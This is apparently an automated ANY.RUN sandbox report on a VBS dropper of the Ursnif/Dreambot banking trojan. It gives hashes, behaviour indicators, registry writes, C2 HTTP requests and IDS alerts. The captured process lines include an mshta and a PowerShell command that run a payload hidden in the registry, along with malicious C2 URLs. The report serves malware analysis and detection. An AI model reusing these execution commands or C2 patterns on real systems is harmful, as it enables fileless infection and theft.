File name:

file.vbs

Full analysis: https://app.any.run/tasks/d86d713b-3a8f-4f8e-bc49-fc98cceda25d
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: September 19, 2019, 06:16:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
gozi
ursnif
dreambot
evasion
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with no line terminators
MD5:

54FE2BB31C7E40D2778DCCEAF1771BBF

SHA1:

6A9190086174ECC42607FBC7689DD6193864D59E

SHA256:

6B1099C73D33285C8CD6313FA0342E6A40F3890709D305E4522E3A406123A1B4

SSDEEP:

24576:wJoLWXjGxPNfyt+gUhW5X18ccI7cI/MPsW+ovxg09jE8Vdf9:wuLWXjust+gUhW5X18cx7hMd1xHjE8V/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • zydnzZz.exe (PID: 2172)
    • URSNIF was detected

      • iexplore.exe (PID: 3320)
      • iexplore.exe (PID: 3924)
      • iexplore.exe (PID: 3136)
    • Connects to CnC server

      • iexplore.exe (PID: 3320)
      • iexplore.exe (PID: 3924)
      • iexplore.exe (PID: 3136)
    • Executes PowerShell scripts

      • mshta.exe (PID: 2744)
    • Starts Visual C# compiler

      • powershell.exe (PID: 3044)
    • Application was injected by another process

      • explorer.exe (PID: 276)
    • Runs injected code in another process

      • powershell.exe (PID: 3044)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 3240)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 276)
  • SUSPICIOUS

    • Executes scripts

      • explorer.exe (PID: 276)
    • Executable content was dropped or overwritten

      • WScript.exe (PID: 3304)
    • Executed via COM

      • iexplore.exe (PID: 2680)
      • iexplore.exe (PID: 3568)
      • iexplore.exe (PID: 3200)
    • Executed via WMI

      • zydnzZz.exe (PID: 2172)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • explorer.exe (PID: 276)
    • Starts CMD.EXE for commands execution

      • explorer.exe (PID: 276)
    • Creates files in the user directory

      • powershell.exe (PID: 3044)
    • Starts CMD.EXE for self-deleting

      • explorer.exe (PID: 276)
    • Checks for external IP

      • nslookup.exe (PID: 3832)
    • Reads Internet Cache Settings

      • explorer.exe (PID: 276)
  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 2680)
      • iexplore.exe (PID: 3568)
      • iexplore.exe (PID: 3200)
    • Application launched itself

      • iexplore.exe (PID: 2680)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3320)
      • iexplore.exe (PID: 3924)
      • iexplore.exe (PID: 3136)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3320)
      • iexplore.exe (PID: 3924)
      • iexplore.exe (PID: 3136)
      • mshta.exe (PID: 2744)
    • Manual execution by user

      • mshta.exe (PID: 2744)
      • cmd.exe (PID: 3240)
    • Reads settings of System Certificates

      • explorer.exe (PID: 276)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
60
Monitored processes
21
Malicious processes
10
Suspicious processes
0

Behavior graph

Click at the process to see the details
start inject wscript.exe zydnzzz.exe no specs iexplore.exe #URSNIF iexplore.exe iexplore.exe no specs #URSNIF iexplore.exe iexplore.exe #URSNIF iexplore.exe mshta.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs #URSNIF explorer.exe cmd.exe no specs ping.exe no specs cmd.exe no specs nslookup.exe cmd.exe no specs makecab.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
276C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\winanr.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
892"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\pswi7oge.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2172C:\Users\admin\AppData\Local\Temp\zydnzZz.exeC:\Users\admin\AppData\Local\Temp\zydnzZz.exewmiprvse.exe
User:
admin
Company:
Duckcircle BigMachines
Integrity Level:
MEDIUM
Description:
ShouldCreate
Exit code:
0
Version:
15.5.66.67
Modules
Images
c:\users\admin\appdata\local\temp\zydnzzz.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winspool.drv
2200C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES2F1A.tmp" "c:\Users\admin\AppData\Local\Temp\CSC2F19.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
2420cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\admin\AppData\Local\Temp\F7B4.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2680"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
2744"C:\Windows\System32\mshta.exe" "about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\89726C36-545A-A301-A6CD-C8873A517CAB\\Devivmgr'));if(!window.flag)close()</script>"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
2996C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES2E4F.tmp" "c:\Users\admin\AppData\Local\Temp\CSC2E4E.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
3044"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty "HKCU:Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB").crypptsp))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
3048makecab.exe /F "C:\Users\admin\AppData\Local\Temp\26A8.bin"C:\Windows\system32\makecab.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Cabinet Maker
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\makecab.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
1 839
Read events
1 602
Write events
232
Delete events
5

Modification events

(PID) Process:(276) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Operation:writeName:{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\jfpevcg.rkr
Value:
00000000000000000000000000000000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF000000000000000000000000
(PID) Process:(276) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Operation:writeName:HRZR_PGYFRFFVBA
Value:
000000001C0000002500000093800C00090000000D000000CC19050033003000380030003400360042003000410046003400410033003900430042000000460032002D0039003300300035002D003600370044004500300042003200380046004300320033007D005C006500780070006C006F007200650072002E006500780065000000740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C0049006E007400650072006E006500740020004500780070006C006F007200650072005C0051007500690063006B0020004C00610075006E00630068005C0055007300650072002000500069006E006E006500000000000034FF01F832FF01D4E3E1013DA94A7600000000FBFFFF7FF8E3E101987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF000000000000000000000000534275066D42750653427506000000000000000000000000080000002E006C00E72F0A77A48EF37600000000AC032E0000002E00E72F0A77B08EF37603005B019604010000002E005B148D23020000006CE4E101B07F0A7744E5E1010000000058005A0044E5E1010200000010E5E101F2700A7791830A771C8FF37611000000B8453100B045310078192F00F8FD580600E500008F148D23B0E4E10182914A7600E5E101B4E4E10127954A7600000000CC90FF01DCE4E101CD944A76CC90FF0188E5E101408CFF01E1944A7600000000408CFF0188E5E101E4E4E101090000000D000000CC19050033003000380030003400360042003000410046003400410033003900430042000000460032002D0039003300300035002D003600370044004500300042003200380046004300320033007D005C006500780070006C006F007200650072002E006500780065000000740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C0049006E007400650072006E006500740020004500780070006C006F007200650072005C0051007500690063006B0020004C00610075006E00630068005C0055007300650072002000500069006E006E006500000000000034FF01F832FF01D4E3E1013DA94A7600000000FBFFFF7FF8E3E101987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF000000000000000000000000534275066D42750653427506000000000000000000000000080000002E006C00E72F0A77A48EF37600000000AC032E0000002E00E72F0A77B08EF37603005B019604010000002E005B148D23020000006CE4E101B07F0A7744E5E1010000000058005A0044E5E1010200000010E5E101F2700A7791830A771C8FF37611000000B8453100B045310078192F00F8FD580600E500008F148D23B0E4E10182914A7600E5E101B4E4E10127954A7600000000CC90FF01DCE4E101CD944A76CC90FF0188E5E101408CFF01E1944A7600000000408CFF0188E5E101E4E4E101090000000D000000CC19050033003000380030003400360042003000410046003400410033003900430042000000460032002D0039003300300035002D003600370044004500300042003200380046004300320033007D005C006500780070006C006F007200650072002E006500780065000000740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C0049006E007400650072006E006500740020004500780070006C006F007200650072005C0051007500690063006B0020004C00610075006E00630068005C0055007300650072002000500069006E006E006500000000000034FF01F832FF01D4E3E1013DA94A7600000000FBFFFF7FF8E3E101987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF000000000000000000000000534275066D42750653427506000000000000000000000000080000002E006C00E72F0A77A48EF37600000000AC032E0000002E00E72F0A77B08EF37603005B019604010000002E005B148D23020000006CE4E101B07F0A7744E5E1010000000058005A0044E5E1010200000010E5E101F2700A7791830A771C8FF37611000000B8453100B045310078192F00F8FD580600E500008F148D23B0E4E10182914A7600E5E101B4E4E10127954A7600000000CC90FF01DCE4E101CD944A76CC90FF0188E5E101408CFF01E1944A7600000000408CFF0188E5E101E4E4E101
(PID) Process:(3304) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3304) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3304) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Operation:writeName:Implementing
Value:
1C00000001000000E307090004001300060010002400BA0300000000
(PID) Process:(2680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(2680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(2680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
Executable files
1
Suspicious files
9
Text files
17
Unknown types
4

Dropped files

PID
Process
Filename
Type
3304WScript.exeC:\Users\admin\AppData\Local\Temp\cIbHOuU.txt
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF109C6CED47E35B01.TMP
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{20C5A5DA-DAA5-11E9-B86F-5254004A04AF}.dat
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF850A1E11CB0852AA.TMP
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{20C5A5D9-DAA5-11E9-B86F-5254004A04AF}.dat
MD5:
SHA256:
3568iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3568iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFD857C97DBA4719DE.TMP
MD5:
SHA256:
3568iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{2DD90B72-DAA5-11E9-B86F-5254004A04AF}.dat
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
15
DNS requests
9
Threats
23

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3924
iexplore.exe
GET
404
172.217.22.5:80
http://gmail.com/images/LCY39Z5cFqau4/1o_2Fw75/lYjWXRBQpq4Br4tO2800yU3/IZ_2FlEWND/Tb7WqVGDVdl5Frb2T/SXhS2C0_2FI_/2BODsiKCfeJ/uuV55bQhYtw5kR/hgjZGTlueE9FzL6lk5DKP/tEWlqRBSdyy0MZ4Q/C5uFPk2aXPgc/3.avi
US
html
1.70 Kb
shared
3136
iexplore.exe
GET
200
185.49.68.108:80
http://185.49.68.108/images/M4DUflZqJmnyEO8I/mpqveVYGikzOYaX/dgQ_2BULa9_2Fl80SK/D8nw0Rnmp/0ppjFYHbiSUOvqDPKYYO/Gv8lwl3XkL_2FpOgPt2/DvrsGoCByUeJGijXwmLYM1/bfOYPbeAPunu3/tOwYQGbV/nuJkmoZ9B/_2FLX3qv/n.avi
DE
text
213 Kb
malicious
3136
iexplore.exe
GET
200
185.49.68.108:80
http://185.49.68.108/images/Jq5Fx_2FOk_2BRYky27pg/gKKIwPu2wLlvkzWj/qWkcffxs8E6MG6O/h249rCj4kavVEhn2KX/ZSVcHMEaD/_2FV96VBGfL0eGD3xb_2/FOaFHpqavI_2BYS8NAX/DDU9CqbxyMVf4NCPe9a4EL/6XFk5hEziyCvPqzHcj_2B/3.avi
DE
text
2.32 Kb
malicious
3200
iexplore.exe
GET
200
185.49.68.108:80
http://185.49.68.108/favicon.ico
DE
image
5.30 Kb
malicious
3320
iexplore.exe
GET
404
172.217.18.174:80
http://google.com/images/gp0NPEGPJh/IMBJ24uTCR_2Fs2qn/_2B0xZoGd1L7/J_2FmW5WueD/4_2F3_2F6H3BAA/qT_2BfrjkNCNkCF3U9rcW/WdlJp5frkxOhfjbI/8d_2FnJX0R6g8dI/L9LG7daBXt78A8iu2n/UQeBwY6QW/GnCVNyGm_2/FonN3N7gU/9WUk.avi
US
html
1.71 Kb
malicious
276
explorer.exe
GET
200
95.101.72.115:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
unknown
compressed
57.0 Kb
whitelisted
3320
iexplore.exe
GET
200
172.217.16.132:80
http://www.google.com/images/errors/robot.png
US
image
6.18 Kb
malicious
3320
iexplore.exe
GET
200
172.217.16.132:80
http://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
US
image
3.10 Kb
malicious
2680
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2680
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3320
iexplore.exe
172.217.18.174:80
google.com
Google Inc.
US
whitelisted
3320
iexplore.exe
172.217.16.132:80
www.google.com
Google Inc.
US
whitelisted
3924
iexplore.exe
172.217.22.5:80
gmail.com
Google Inc.
US
whitelisted
3136
iexplore.exe
185.49.68.108:80
Leaseweb Deutschland GmbH
DE
malicious
192.119.111.106:443
Hostwinds LLC.
US
malicious
276
explorer.exe
151.106.56.169:443
US
malicious
276
explorer.exe
95.101.72.115:80
www.download.windowsupdate.com
Akamai International B.V.
whitelisted
276
explorer.exe
172.217.22.5:443
gmail.com
Google Inc.
US
whitelisted
3200
iexplore.exe
185.49.68.108:80
Leaseweb Deutschland GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
google.com
  • 172.217.18.174
malicious
www.google.com
  • 172.217.16.132
malicious
gmail.com
  • 172.217.22.5
shared
resolver1.opendns.com
  • 208.67.222.222
shared
222.222.67.208.in-addr.arpa
unknown
myip.opendns.com
  • 89.187.165.52
shared
www.download.windowsupdate.com
  • 95.101.72.115
  • 95.101.72.131
whitelisted

Threats

PID
Process
Class
Message
3320
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3924
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] Spy:Win32/Dreambot/Ursnif
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot/Ursnif HTTP GET Check-in
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] Spy:Win32/Dreambot/Ursnif
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot/Ursnif HTTP GET Check-in
3832
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
3832
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
9 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144